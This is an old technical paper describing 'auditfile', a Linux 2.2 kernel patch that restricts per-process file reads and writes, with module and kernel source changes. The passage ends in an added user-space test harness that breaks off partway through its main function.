      Submitted by {}

      Some Extra Security In The Linux Kernel - Auditfile
              a paper by Frank van Vliet alias {}
                    karin@root66.nl.eu.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~	    
      RooT66                      http://root66.nl.eu.org
      ShellOracle          http://www.shelloracle.cjb.net
      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      
      First read:
      	Kernel Hackers Guide				-http://www.linuxhq.com/guides
      	The Linux Kernel				-http://www.linuxhq.com/guides
      	The Linux Kernel Module Programming Guide	-http://www.linuxhq.com/guides
      	
      The tarball can be downloaded from http://root66.nl.eu.org/karin/auditfile-0.39.tar.gz
      
      
      ----------[ about me
      
      	I'm Frank van Vliet alias {}, networking/security/linuxfreak and leader
      	of RooT66 (http://root66.nl.eu.org) 
      	You can contact me on karin@root66.nl.eu.org
      	
      ----------[ introduction
      
      	There is no such thing as 100% security, so why act like you are safe 
      	by downloading the latest patches? 'My script automatically downloads 
      	the latest patches and installs them, my box is secure' - right. Why
      	not flip it over and say every process is insecure? Every process has a
      	goal; let's give it permission to accomplish that goal and restrict it
      	as much as possible.
      	
      	Auditfile is a security patch I wrote some time ago that makes it 
      	possible to restrict the use of files per process, so we can say
      	
      		-Our httpserver can only
      			read:
      				/usr/local/apache/conf/*
      				/usr/local/apache/htdocs*
      				/usr/local/apache/cgi-bin/*
      			write:
      				/usr/local/apache/logs/*
      			both read and write:
      				/usr/local/apache/cgi-bin/guestbook_database/*
      
      				
      ----------[ how to add those security options
      
      ------------------[ task_struct
      
      	Every process has its own task_struct in the global array of current 
      	tasks (task_list). This task_struct contains things like filename, 
      	environment, uid, gid, euid, and so on. This seems to be the right place
      	to add a
      	
      		char *auditfile; 	// pointing to memory where rules for auditfile are put
      		int auditfile_len;	// integer telling size of memory used for rules for auditfile
      		
      	We can find struct task_struct in /usr/src/linux/include/linux/sched.h 
      	so add that char * and that int to the task_struct.
      	
      	
      ------------------[ what should this memory look like?
      	
      	I came up with the following map of the memory
      	
      	Flags:
      		read = 1
      		write = 2
      		both read and write = 3
      
      	sprintf(buffer_for_auditfile_rules, "\0%c%s\0%c%s\0%c%s\0%c%s.....\0\0", flag, match, flag, match, flag, match, flag, match, .....);
      
      	(schematic only: a real sprintf stops at the first \0, which is why the module below writes the bytes one by one)
      
      	Example: 
      		read /usr/bin/*
      		read /lib/*
      		read /etc*
      		both /tmp*
      		write /tmp/write/*
      	
      	would look like
      
      	\0\1/usr/bin/*\0\1/lib/*\0\1/etc*\0\3/tmp*\0\2/tmp/write/*\0\0
      
      	
      ------------------[ how do we get this memory attached to new processes
      	
      	I wrote a little kernel module that allocates memory, fills it with 
      	rules, and attaches that memory to the 
      	task_struct_of_process_to_edit.auditfile, here it is:
      	
      -----[ WARNING ADULT CONTENTS ]-----
      #include <linux/kernel.h>
      #include <linux/module.h>
      
      #if CONFIG_MODVERSIONS==1
      #define MODVERSIONS
      #include <linux/modversions.h>
      #endif
      
      
      #include <sys/syscall.h>
      #include <linux/sched.h>
      #include <linux/malloc.h>
      
      #ifndef KERNEL_VERSION
      #define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
      #endif /*KERNEL_VERSION*/
      
      #if LINUX_VERSION_CODE>=KERNEL_VERSION(2,2,0)
      #include <asm/uaccess.h>		
      #endif
      
      int	pid=0;
      char 	*command;
      char	*parm;
      char 	parsedrule[0xFFFF];  // sorry very ugly, but to lazy to fix ((:
      char	*parsedrulereal;
      MODULE_PARM(pid, "i");
      MODULE_PARM(command, "s");
      MODULE_PARM(parm, "s");
      
        
      
      
      
      int init_module()
      {
      	int i=0,j=0,h=0;
      	struct task_struct *p;
      
      	read_lock(&tasklist_lock);
      	for_each_task(p)
      	{
      		if ((p->pid)==pid) {
      			/* first rule: parm[0] is its flag letter */
      			switch (parm[i]) {
      				case 'r':
      					parsedrule[j] = 0;
      					parsedrule[j+1] = 1;
      					j+=2;
      					break;
      				case 'w':
      					parsedrule[j] = 0;
      					parsedrule[j+1] = 2;
      					j+=2;
      					break;
      				case 'b':
      					parsedrule[j] = 0;
      					parsedrule[j+1] = 3;
      					j+=2;
      					break;
      			}
      			/* remaining rules: a space is followed by the next flag letter,
      			 * every other character is copied into the match string */
      			for (i=1;h!=1;i++) {
      				switch (parm[i]) {
      					case 0:
      						h = 1;
      						break;
      					case ' ':
      						switch (parm[i+1]) {
      							case 'r':
      								parsedrule[j] = 0;
      								parsedrule[j+1] = 1;
      								j+=2;
      								i++;
      								break;
      							case 'w':
      								parsedrule[j] = 0;
      								parsedrule[j+1] = 2;
      								j+=2;
      								i++;
      								break;
      							case 'b':
      								parsedrule[j] = 0;
      								parsedrule[j+1] = 3;
      								j+=2;
      								i++;
      								break;
      						}
      						break;
      					default:
      						parsedrule[j] = parm[i];
      						j++;
      						break;
      				}
      			}
      			/* terminating \0\0 */
      			parsedrule[j] = 0;
      			parsedrule[j+1] = 0;
      
      			parsedrulereal = (char *) kmalloc(j + 2, GFP_KERNEL);
      			if (parsedrulereal == NULL) {
      				/* no memory for the rules: refuse to load rather than
      				 * attach a NULL rule block to the process */
      				read_unlock(&tasklist_lock);
      				return -ENOMEM;
      			}
      			for (h=0;h<j+2;h++) {
      				parsedrulereal[h] = parsedrule[h];
      			}
      
      			/* replace any rule block the process already had */
      			if (p->auditfile_len > 0) {
      				kfree(p->auditfile);
      			}
      			p->auditfile = parsedrulereal;
      			p->auditfile_len = (j + 2);
      		}
      	}
      	read_unlock(&tasklist_lock);
      
      	return(0);
      }
      
      
      void cleanup_module()
      {
      }
      -----[ END OF ADULT CONTENTS ]-----
      	
      
      	This module attaches memory to a pid, you should load it with
      		insmod auditfile.o pid=PID parm="r/usr/bin/* r/etc/* r/lib/* b/tmp* w/tmp/write/*"
      	
      	
      		
      	I made a couple of tools to automate this when a process is started, 
      	you can find them in auditfile-0.39.tar.gz
      	
      	
      ------------------[ copying the char *auditfile and int auditfile_len to new processes
      	
      	Of course we want child processes of the processes we restricted to run 
      	with the same auditfile rules, so we add a couple of lines 
      	to /usr/src/linux/kernel/fork.c 
      	
      
      -----[ WARNING ADULT CONTENTS ]-----
      int do_fork(unsigned long clone_flags, unsigned long usp, struct pt_regs *regs)
      {
      	int nr;
      	int retval = -EINVAL;
      	struct task_struct *p;
      	struct semaphore sem = MUTEX_LOCKED;
      
      /*
       * Disallow unknown clone(2) flags, as well as CLONE_PID, unless we are
       * the boot up thread.
       *
       * Avoid taking any branches in the common case.
       */
      	if (clone_flags &
      	    (-(signed long)current->pid >> (sizeof(long) * 8 - 1)) &
      	    ~(unsigned long)(CSIGNAL |
      	    CLONE_VM | CLONE_FS | CLONE_FILES |
      	    CLONE_SIGHAND | CLONE_PTRACE | CLONE_VFORK))
      		goto fork_out;
      
      	current->vfork_sem = &sem;
      
      	retval = -ENOMEM;
      	p = alloc_task_struct();
      	if (!p)
      		goto fork_out;
      
      	*p = *current;
      
      /* INCLUDED FOR AUDITFILE */
      	/* the child starts without rules; they are copied from the parent below */
      	p->auditfile = NULL;
      	p->auditfile_len = 0;
      /* END OF INCLUDED FOR AUDITFILE */
      	
      	down(&current->mm->mmap_sem);
      	lock_kernel();
      
      	retval = -EAGAIN;
      	if (p->user) {
      		if (atomic_read(&p->user->count) >= p->rlim[RLIMIT_NPROC].rlim_cur)
      			goto bad_fork_free;
      		atomic_inc(&p->user->count);
      	}
      
      	{
      		struct task_struct **tslot;
      		tslot = find_empty_process();
      		if (!tslot)
      			goto bad_fork_cleanup_count;
      		p->tarray_ptr = tslot;
      		*tslot = p;
      		nr = tslot - &task[0];
      	}
      
      	if (p->exec_domain && p->exec_domain->module)
      		__MOD_INC_USE_COUNT(p->exec_domain->module);
      	if (p->binfmt && p->binfmt->module)
      		__MOD_INC_USE_COUNT(p->binfmt->module);
      
      	p->did_exec = 0;
      	p->swappable = 0;
      	p->state = TASK_UNINTERRUPTIBLE;
      
      	copy_flags(clone_flags, p);
      	p->pid = get_pid(clone_flags);
      
      	/*
      	 * This is a "shadow run" state. The process
      	 * is marked runnable, but isn't actually on
      	 * any run queue yet.. (that happens at the
      	 * very end).
      	 */
      	p->state = TASK_RUNNING;
      	p->next_run = p;
      	p->prev_run = p;
      
      	p->p_pptr = p->p_opptr = current;
      	p->p_cptr = NULL;
      	init_waitqueue(&p->wait_chldexit);
      	p->vfork_sem = NULL;
      
      	p->sigpending = 0;
      	sigemptyset(&p->signal);
      	p->sigqueue = NULL;
      	p->sigqueue_tail = &p->sigqueue;
      
      	spin_lock_init(&p->priv_lock);
      	p->priv = 0;
      	p->ppriv = current->priv;
      
      	p->it_real_value = p->it_virt_value = p->it_prof_value = 0;
      	p->it_real_incr = p->it_virt_incr = p->it_prof_incr = 0;
      	init_timer(&p->real_timer);
      	p->real_timer.data = (unsigned long) p;
      
      	p->leader = 0;		/* session leadership doesn't inherit */
      	p->tty_old_pgrp = 0;
      	p->times.tms_utime = p->times.tms_stime = 0;
      	p->times.tms_cutime = p->times.tms_cstime = 0;
      #ifdef __SMP__
      	{
      		int i;
      		p->has_cpu = 0;
      		p->processor = current->processor;
      		/* ?? should we just memset this ?? */
      		for(i = 0; i < smp_num_cpus; i++)
      			p->per_cpu_utime[i] = p->per_cpu_stime[i] = 0;
      		spin_lock_init(&p->sigmask_lock);
      	}
      #endif
      	p->lock_depth = -1;		/* -1 = no lock */
      	p->start_time = jiffies;
      
      	retval = -ENOMEM;
      	/* copy all the process information */
      	if (copy_files(clone_flags, p))
      		goto bad_fork_cleanup;
      	if (copy_fs(clone_flags, p))
      		goto bad_fork_cleanup_files;
      	if (copy_sighand(clone_flags, p))
      		goto bad_fork_cleanup_fs;
      	if (copy_mm(nr, clone_flags, p))
      		goto bad_fork_cleanup_sighand;
      	retval = copy_thread(nr, clone_flags, usp, p, regs);
      	if (retval)
      		goto bad_fork_cleanup_mm;
      	p->semundo = NULL;
      
      /* INCLUDED FOR AUDITFILE */
      	if (current->auditfile_len > 0) {
      		p->auditfile_len = current->auditfile_len;
      		p->auditfile = (char *) kmalloc(p->auditfile_len, GFP_KERNEL);
      		if (p->auditfile == NULL) {
      			/* note: the child then runs without any auditfile rules */
      			printk(KERN_INFO "Warning: out of mem to add auditfile rules to process %d\n", p->pid);
      			p->auditfile_len = 0;
      		} else {
      			memcpy(p->auditfile, current->auditfile, current->auditfile_len);
      		}
      	}
      /* END OF INCLUDED FOR AUDITFILE */
      	
      	/* ok, now we should be set up.. */
      	p->swappable = 1;
      	p->exit_signal = clone_flags & CSIGNAL;
      	p->pdeath_signal = 0;
      
      	/*
      	 * "share" dynamic priority between parent and child, thus the
      	 * total amount of dynamic priorities in the system doesnt change,
      	 * more scheduling fairness. This is only important in the first
      	 * timeslice, on the long run the scheduling behaviour is unchanged.
      	 */
      	current->counter >>= 1;
      	p->counter = current->counter;
      
      	/*
      	 * Ok, add it to the run-queues and make it
      	 * visible to the rest of the system.
      	 *
      	 * Let it rip!
      	 */
      	retval = p->pid;
      	if (retval) {
      		write_lock_irq(&tasklist_lock);
      		SET_LINKS(p);
      		hash_pid(p);
      		write_unlock_irq(&tasklist_lock);
      
      		nr_tasks++;
      
      		p->next_run = NULL;
      		p->prev_run = NULL;
      		wake_up_process(p);		/* do this last */
      	}
      	++total_forks;
      bad_fork:
      	unlock_kernel();
      	up(&current->mm->mmap_sem);
      fork_out:
      	if ((clone_flags & CLONE_VFORK) && (retval > 0)) 
      		down(&sem);
      	return retval;
      
      bad_fork_cleanup_mm:
      	mmput(p->mm);
      	p->mm = NULL;
      bad_fork_cleanup_sighand:
      	exit_sighand(p);
      bad_fork_cleanup_fs:
      	exit_fs(p); /* blocking */
      bad_fork_cleanup_files:
      	exit_files(p); /* blocking */
      bad_fork_cleanup:
      	if (p->exec_domain && p->exec_domain->module)
      		__MOD_DEC_USE_COUNT(p->exec_domain->module);
      	if (p->binfmt && p->binfmt->module)
      		__MOD_DEC_USE_COUNT(p->binfmt->module);
      
      	add_free_taskslot(p->tarray_ptr);
      bad_fork_cleanup_count:
      	if (p->user)
      		free_uid(p);
      bad_fork_free:
      	free_task_struct(p);
      	goto bad_fork;
      }
      -----[ END OF ADULT CONTENTS ]-----
      
      	Besides editing fork, we should also initialise the char *auditfile and 
      	the int auditfile_len of the very first process (init), so in 
      	/usr/src/linux/kernel/init.c we add something too:
      
      -----[ WARNING ADULT CONTENTS ]-----
      static int init(void * unused)
      {
      	lock_kernel();
      	do_basic_setup();
      
      	/*
      	 * Ok, we have completed the initial bootup, and
      	 * we're essentially up and running. Get rid of the
      	 * initmem segments and start the user-mode stuff..
      	 */
      	free_initmem();
      	unlock_kernel();
      
      /* INCLUDED FOR AUDITFILE */
      	current->auditfile = NULL;
      	current->auditfile_len = 0;
      /* END OF INCLUDED FOR AUDITFILE */
      -----[ END OF ADULT CONTENTS ]-----	
      	
      ------------------[ destroying memory when process dies
      	
      	Because this is arch specific and I use an x86, I only edit 
      	/usr/src/linux/arch/i386/kernel/process.c
      
      -----[ WARNING ADULT CONTENTS ]-----
      void free_task_struct(struct task_struct *p)
      {
      /* INCLUDED FOR AUDITFILE */
      	if (p->auditfile_len > 0) {
      		kfree(p->auditfile);
      	}
      	{	/* extra block so the declaration below stays legal C */
      /* END OF INCLUDED FOR AUDITFILE */
      #ifdef EXTRA_TASK_STRUCT
      	int index = task_struct_stack_ptr+1;
      
      	if (index < EXTRA_TASK_STRUCT) {
      		task_struct_stack[index] = p;
      		task_struct_stack_ptr = index;
      	} else
      #endif
      		free_pages((unsigned long) p, 1);
      /* INCLUDED FOR AUDITFILE */
      	}
      /* END OF INCLUDED FOR AUDITFILE */
      }
      -----[ END OF ADULT CONTENTS ]-----
      	
      	
      ------------------[ check for auditfile rules when a process wants to read/write to a file
      	
      	When a process opens a file, it calls the sys_open function, and this 
      	function (indirectly) calls open_namei().
      	
      	This is what that function looks like in 2.2.12:
      
      -----[ WARNING ADULT CONTENTS ]-----
      /*
       *	open_namei()
       *
       * namei for open - this is in fact almost the whole open-routine.
       *
       * Note that the low bits of "flag" aren't the same as in the open
       * system call - they are 00 - no permissions needed
       *			  01 - read permission needed
       *			  10 - write permission needed
       *			  11 - read/write permissions needed
       * which is a lot more logical, and also allows the "no perm" needed
       * for symlinks (where the permissions are checked later).
       */
      struct dentry * open_namei(const char * pathname, int flag, int mode)
      {
      	int acc_mode, error;
      	struct inode *inode;
      	struct dentry *dentry;
      
      	mode &= S_IALLUGO & ~current->fs->umask;
      	mode |= S_IFREG;
      
      	dentry = lookup_dentry(pathname, NULL, lookup_flags(flag));
      	if (IS_ERR(dentry))
      		return dentry;
      
      	acc_mode = ACC_MODE(flag);
      	if (flag & O_CREAT) {
      		struct dentry *dir;
      
      		if (dentry->d_inode) {
      			error = -EEXIST;
      			if (flag & O_EXCL)
      				goto exit;
      #ifdef CONFIG_SECURE_FIFO
      			if (!S_ISFIFO(dentry->d_inode->i_mode))
      				goto nocreate;
      #else
      			goto nocreate;
      #endif
      		}
      
      		dir = lock_parent(dentry);
      		if (!check_parent(dir, dentry)) {
      			/*
      			 * Really nasty race happened. What's the 
      			 * right error code? We had a dentry, but
      			 * before we could use it it was removed
      			 * by somebody else. We could just re-try
      			 * everything, I guess.
      			 *
      			 * ENOENT is definitely wrong.
      			 */
      			error = -ENOENT;
      			unlock_dir(dir);
      			goto exit;
      		}
      
      #ifdef CONFIG_SECURE_FIFO
      		/*
      		 * Don't write to FIFOs that we don't own in +t directories,
      		 * unless the FIFO is owned by root.
      		 */
      		if ((inode = dentry->d_inode))
      		if (S_ISFIFO(inode->i_mode) && !(flag & O_EXCL) &&
      		    (dir->d_inode->i_mode & S_ISVTX) &&
      		    inode->i_uid &&
      		    current->fsuid != inode->i_uid) {
      			security_alert("denied writing FIFO of %d.%d "
      				"by UID %d, EUID %d, process %s:%d",
      				"writes into a FIFO denied",
      				inode->i_uid, inode->i_gid,
      				current->uid, current->euid,
      				current->comm, current->pid);
      			error = -EACCES;
      			unlock_dir(dir);
      			goto exit;
      		}
      #endif
      
      		/*
      		 * Somebody might have created the file while we
      		 * waited for the directory lock.. So we have to
      		 * re-do the existence test.
      		 */
      		if (dentry->d_inode) {
      			error = 0;
      			if (flag & O_EXCL)
      				error = -EEXIST;
      		} else if ((error = may_create(dir->d_inode, dentry)) == 0) {
      			if (!dir->d_inode->i_op || !dir->d_inode->i_op->create)
      				error = -EACCES;
      			else {
      				DQUOT_INIT(dir->d_inode);
      				error = dir->d_inode->i_op->create(dir->d_inode, dentry, mode);
      				/* Don't check for write permission, don't truncate */
      				acc_mode = 0;
      				flag &= ~O_TRUNC;
      			}
      		}
      		unlock_dir(dir);
      		if (error)
      			goto exit;
      	}
      
      nocreate:
      	error = -ENOENT;
      	inode = dentry->d_inode;
      	if (!inode)
      		goto exit;
      
      	error = -ELOOP;
      	if (S_ISLNK(inode->i_mode))
      		goto exit;
      	
      	error = -EISDIR;
      	if (S_ISDIR(inode->i_mode) && (flag & FMODE_WRITE))
      		goto exit;
      
      	error = permission(inode,acc_mode);
      	if (error)
      		goto exit;
      
      	/*
      	 * FIFO's, sockets and device files are special: they don't
      	 * actually live on the filesystem itself, and as such you
      	 * can write to them even if the filesystem is read-only.
      	 */
      	if (S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) {
      	    	flag &= ~O_TRUNC;
      	} else if (S_ISBLK(inode->i_mode) || S_ISCHR(inode->i_mode)) {
      		error = -EACCES;
      		if (IS_NODEV(inode))
      			goto exit;
      
      		flag &= ~O_TRUNC;
      	} else {
      		error = -EROFS;
      		if (IS_RDONLY(inode) && (flag & 2))
      			goto exit;
      	}
      	/*
      	 * An append-only file must be opened in append mode for writing.
      	 */
      	error = -EPERM;
      	if (IS_APPEND(inode)) {
      		if  ((flag & FMODE_WRITE) && !(flag & O_APPEND))
      			goto exit;
      		if (flag & O_TRUNC)
      			goto exit;
      	}
      
      	if (flag & O_TRUNC) {
      		error = get_write_access(inode);
      		if (error)
      			goto exit;
      
      		/*
      		 * Refuse to truncate files with mandatory locks held on them.
      		 */
      		error = locks_verify_locked(inode);
      		if (!error) {
      			DQUOT_INIT(inode);
      			
      			error = do_truncate(dentry, 0);
      		}
      		put_write_access(inode);
      		if (error)
      			goto exit;
      	} else
      		if (flag & FMODE_WRITE)
      			DQUOT_INIT(inode);
      
      	return dentry;
      
      exit:
      	dput(dentry);
      	return ERR_PTR(error);
      }
      -----[ END OF ADULT CONTENTS ]-----
      
      
      	This function checks permissions, resolves symlinks and so on; when 
      	everything is OK it returns the dentry and permission is granted. We 
      	don't want to lose the normal restrictions, or have our auditfile rules 
      	overrule the general permissions, so we put our check last, 
      	just before return dentry.
      	
      	
      	This is how I implemented it:
      	
      -----[ WARNING ADULT CONTENTS ]-----
      /*
       *	open_namei()
       *
       * namei for open - this is in fact almost the whole open-routine.
       *
       * Note that the low bits of "flag" aren't the same as in the open
       * system call - they are 00 - no permissions needed
       *			  01 - read permission needed
       *			  10 - write permission needed
       *			  11 - read/write permissions needed
       * which is a lot more logical, and also allows the "no perm" needed
       * for symlinks (where the permissions are checked later).
       */
      struct dentry * open_namei(const char * pathname, int flag, int mode)
      {
      	int acc_mode, error;
      	struct inode *inode;
      	struct dentry *dentry;
      
      	mode &= S_IALLUGO & ~current->fs->umask;
      	mode |= S_IFREG;
      
      	dentry = lookup_dentry(pathname, NULL, lookup_flags(flag));
      	if (IS_ERR(dentry))
      		return dentry;
      
      	acc_mode = ACC_MODE(flag);
      	if (flag & O_CREAT) {
      		struct dentry *dir;
      
      		if (dentry->d_inode) {
      			error = -EEXIST;
      			if (flag & O_EXCL)
      				goto exit;
      #ifdef CONFIG_SECURE_FIFO
      			if (!S_ISFIFO(dentry->d_inode->i_mode))
      				goto nocreate;
      #else
      			goto nocreate;
      #endif
      		}
      
      		dir = lock_parent(dentry);
      		if (!check_parent(dir, dentry)) {
      			/*
      			 * Really nasty race happened. What's the 
      			 * right error code? We had a dentry, but
      			 * before we could use it it was removed
      			 * by somebody else. We could just re-try
      			 * everything, I guess.
      			 *
      			 * ENOENT is definitely wrong.
      			 */
      			error = -ENOENT;
      			unlock_dir(dir);
      			goto exit;
      		}
      
      #ifdef CONFIG_SECURE_FIFO
      		/*
      		 * Don't write to FIFOs that we don't own in +t directories,
      		 * unless the FIFO is owned by root.
      		 */
      		if ((inode = dentry->d_inode))
      		if (S_ISFIFO(inode->i_mode) && !(flag & O_EXCL) &&
      		    (dir->d_inode->i_mode & S_ISVTX) &&
      		    inode->i_uid &&
      		    current->fsuid != inode->i_uid) {
      			security_alert("denied writing FIFO of %d.%d "
      				"by UID %d, EUID %d, process %s:%d",
      				"writes into a FIFO denied",
      				inode->i_uid, inode->i_gid,
      				current->uid, current->euid,
      				current->comm, current->pid);
      			error = -EACCES;
      			unlock_dir(dir);
      			goto exit;
      		}
      #endif
      
      		/*
      		 * Somebody might have created the file while we
      		 * waited for the directory lock.. So we have to
      		 * re-do the existence test.
      		 */
      		if (dentry->d_inode) {
      			error = 0;
      			if (flag & O_EXCL)
      				error = -EEXIST;
      		} else if ((error = may_create(dir->d_inode, dentry)) == 0) {
      			if (!dir->d_inode->i_op || !dir->d_inode->i_op->create)
      				error = -EACCES;
      			else {
      				DQUOT_INIT(dir->d_inode);
      				error = dir->d_inode->i_op->create(dir->d_inode, dentry, mode);
      				/* Don't check for write permission, don't truncate */
      				acc_mode = 0;
      				flag &= ~O_TRUNC;
      			}
      		}
      		unlock_dir(dir);
      		if (error)
      			goto exit;
      	}
      
      nocreate:
      	error = -ENOENT;
      	inode = dentry->d_inode;
      	if (!inode)
      		goto exit;
      
      	error = -ELOOP;
      	if (S_ISLNK(inode->i_mode))
      		goto exit;
      	
      	error = -EISDIR;
      	if (S_ISDIR(inode->i_mode) && (flag & FMODE_WRITE))
      		goto exit;
      
      	error = permission(inode,acc_mode);
      	if (error)
      		goto exit;
      
      	/*
      	 * FIFO's, sockets and device files are special: they don't
      	 * actually live on the filesystem itself, and as such you
      	 * can write to them even if the filesystem is read-only.
      	 */
      	if (S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) {
      	    	flag &= ~O_TRUNC;
      	} else if (S_ISBLK(inode->i_mode) || S_ISCHR(inode->i_mode)) {
      		error = -EACCES;
      		if (IS_NODEV(inode))
      			goto exit;
      
      		flag &= ~O_TRUNC;
      	} else {
      		error = -EROFS;
      		if (IS_RDONLY(inode) && (flag & 2))
      			goto exit;
      	}
      	/*
      	 * An append-only file must be opened in append mode for writing.
      	 */
      	error = -EPERM;
      	if (IS_APPEND(inode)) {
      		if  ((flag & FMODE_WRITE) && !(flag & O_APPEND))
      			goto exit;
      		if (flag & O_TRUNC)
      			goto exit;
      	}
      
      	if (flag & O_TRUNC) {
      		error = get_write_access(inode);
      		if (error)
      			goto exit;
      
      		/*
      		 * Refuse to truncate files with mandatory locks held on them.
      		 */
      		error = locks_verify_locked(inode);
      		if (!error) {
      			DQUOT_INIT(inode);
      			
      			error = do_truncate(dentry, 0);
      		}
      		put_write_access(inode);
      		if (error)
      			goto exit;
      	} else
      		if (flag & FMODE_WRITE)
      			DQUOT_INIT(inode);
      
      	if (current->auditfile_len > 0) {
      		int i;
      		char *filename;
      		char *page = NULL;
      		int rule_matched = 0;	/* becomes 1 as soon as a rule permits this open */
      
      		if (pathname[0] != '/') {
      			/* relative path: rebuild the absolute path from the dentry chain */
      			struct dentry * dentrybackup = dentry;
      			page = (char *) __get_free_page(GFP_USER);
      			if (page) {
      				char * end = page+PAGE_SIZE;
      				char * retval;
      				struct dentry * root = current->fs->root;
      				int buflen = PAGE_SIZE;
      
      				*--end = '\0';
      				buflen--;
      				retval = end;	/* empty string if dentry is the root itself */
      				for (;;) {
      					struct dentry * parent;
      					int namelen;
      					if (dentry == root)
      						break;
      					dentry = dentry->d_covers;
      					parent = dentry->d_parent;
      					if (dentry == parent)
      						break;
      					namelen = dentry->d_name.len;
      					buflen -= namelen + 1;
      					if (buflen < 0)
      						break;
      					end -= namelen;
      					memcpy(end, dentry->d_name.name, namelen);
      					*--end = '/';
      					retval = end;
      					dentry = parent;
      				}
      				dentry = dentrybackup;
      				filename = retval;
      				/* the page is freed only after matching: filename points into it */
      			} else {
      				/* NOTE: this fails open, the open proceeds without auditfile checks */
      				printk(KERN_INFO "auditfile: out of memory, dropped auditfile security\n");
      				return dentrybackup;
      			}
      		} else {
      			filename = (char *) pathname;
      		}
      
      		for (i=0;i<current->auditfile_len;i++) {
      			if (current->auditfile[i] == 0) {
      				if (current->auditfile[i+1] == 0)
      					break;	/* \0\0 terminator */
      				/* a rule applies when its flag covers every access bit requested */
      				if ((((flag & FMODE_WRITE) && (current->auditfile[i+1] == 2) || (current->auditfile[i+1] == 3)) || !(flag & FMODE_WRITE)) &&
      				    (((flag & FMODE_READ) && (current->auditfile[i+1] == 1) || (current->auditfile[i+1] == 3)) || !(flag & FMODE_READ))) {
      					if (auditfile_expression(filename, current->auditfile + i + 2) == 1) {
      						rule_matched = 1;
      						break;
      					}
      				}
      			}
      		}
      		if (page)
      			free_page((unsigned long) page);
      		if (rule_matched != 1) {
      			error = -EACCES;
      			goto exit;
      		}
      	}
      
      	return dentry;
      
      exit:
      	dput(dentry);
      	return ERR_PTR(error);
      }
      -----[ END OF ADULT CONTENTS ]-----
      
      
      	The function auditfile_expression is the following:
      
      -----[ WARNING ADULT CONTENTS ]-----	
      /*
       * Returns 1 when string_mask matches the start of string_base, 0 otherwise.
       * '*' matches any run of characters, including none.  Because matching
       * stops as soon as the mask is exhausted, a rule without a trailing '*'
       * also covers every longer path that begins with it.
       */
      int auditfile_expression(char *string_base, char *string_mask)
      {
      	int i, j;
      	for (i=0;;i++) {
      		if (string_mask[i] == 0) return 1;	/* mask exhausted: prefix matched */
      		if (string_mask[i] == '*') {
      			for (j = 0;;j++) {
      				if (auditfile_expression(string_base + i + j, string_mask + i + 1) == 1) return 1;
      				if (string_base[i+j] == 0) return 0;
      			}
      		}
      		if (string_base[i] != string_mask[i]) return 0;	/* also when the path ends first */
      	}
      }
      -----[ END OF ADULT CONTENTS ]-----
      	It basically does the matching of bl*t against blaat and so on.
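      	To make the rule encoding described under "what should this memory look
      	like?" and the permit/deny walk of the patched open_namei() testable
      	without rebuilding a kernel, here is an added user-space example. It is
      	not part of Frank's paper or of the auditfile tarball: it reimplements
      	the parm= parser of the module, the auditfile_expression() matcher with
      	the same prefix semantics, and the rule walk over the blob. The names
      	auditfile_encode, af_match, auditfile_allowed and the AF_* constants are
      	this example's own, and the policy and probe paths are constructed input.

```c
#include <stdio.h>
#include <string.h>

/* Rule flags from the paper's memory map. */
#define AF_READ  1
#define AF_WRITE 2
#define AF_BOTH  3

/* Access bits as open_namei() sees them (FMODE_READ = 01, FMODE_WRITE = 10);
 * these names belong to this example, not to the kernel. */
#define AF_FMODE_READ  1
#define AF_FMODE_WRITE 2

/* Append one byte while always keeping two bytes free for the final \0\0. */
#define AF_PUT(c) do { if (j >= outlen - 2) return -1; out[j++] = (char)(c); } while (0)

/* Encode rules given in the insmod parm= syntax ("r/usr/bin/* w/tmp/write/*")
 * into the blob layout  \0 flag match \0 flag match ... \0\0.
 * Returns the blob length including the terminator, or -1 on an unknown flag
 * letter or a buffer that is too small (the kernel module checks neither). */
int auditfile_encode(const char *parm, char *out, int outlen)
{
    int j = 0;

    if (outlen < 2)
        return -1;
    while (*parm) {
        int flag;
        switch (*parm) {
        case 'r': flag = AF_READ;  break;
        case 'w': flag = AF_WRITE; break;
        case 'b': flag = AF_BOTH;  break;
        default:  return -1;              /* unknown rule type */
        }
        AF_PUT(0);
        AF_PUT(flag);
        parm++;
        while (*parm && *parm != ' ')     /* match string runs up to the next space */
            AF_PUT(*parm++);
        while (*parm == ' ')
            parm++;
    }
    out[j++] = 0;
    out[j++] = 0;
    return j;
}

/* Same matching as the paper's auditfile_expression(): '*' matches any run of
 * characters, and the mask only has to match a prefix of the path. */
int af_match(const char *path, const char *mask)
{
    int i, j;
    for (i = 0;; i++) {
        if (mask[i] == 0)
            return 1;                     /* mask exhausted: prefix matched */
        if (mask[i] == '*') {
            for (j = 0;; j++) {
                if (af_match(path + i + j, mask + i + 1))
                    return 1;
                if (path[i + j] == 0)
                    return 0;
            }
        }
        if (path[i] != mask[i])
            return 0;                     /* also when the path ends first */
    }
}

/* The walk the patched open_namei() performs: 1 if some rule permits an open
 * of `path` that needs the access bits in `fmode`, else 0 (-EACCES in kernel). */
int auditfile_allowed(const char *blob, int bloblen, const char *path, int fmode)
{
    int i;
    int need_r = (fmode & AF_FMODE_READ)  != 0;
    int need_w = (fmode & AF_FMODE_WRITE) != 0;

    for (i = 0; i + 1 < bloblen; i++) {
        int flag, rule_r, rule_w;
        if (blob[i] != 0)
            continue;                     /* inside a match string */
        flag = blob[i + 1];
        if (flag == 0)
            break;                        /* \0\0 terminator */
        rule_r = (flag == AF_READ  || flag == AF_BOTH);
        rule_w = (flag == AF_WRITE || flag == AF_BOTH);
        if ((!need_r || rule_r) && (!need_w || rule_w) && af_match(path, blob + i + 2))
            return 1;
    }
    return 0;
}

int main(void)
{
    char blob[128];
    /* Constructed policy: the rule set from the paper's insmod example. */
    int len = auditfile_encode("r/usr/bin/* r/etc/* r/lib/* b/tmp* w/tmp/write/*",
                               blob, sizeof blob);
    struct { const char *path; int fmode; } probes[] = {
        { "/etc/passwd",    AF_FMODE_READ },
        { "/etc/passwd",    AF_FMODE_WRITE },
        { "/etc",           AF_FMODE_READ },
        { "/tmp/x",         AF_FMODE_READ | AF_FMODE_WRITE },
        { "/tmp/write/log", AF_FMODE_WRITE },
        { "/var/run/utmp",  AF_FMODE_READ },
    };
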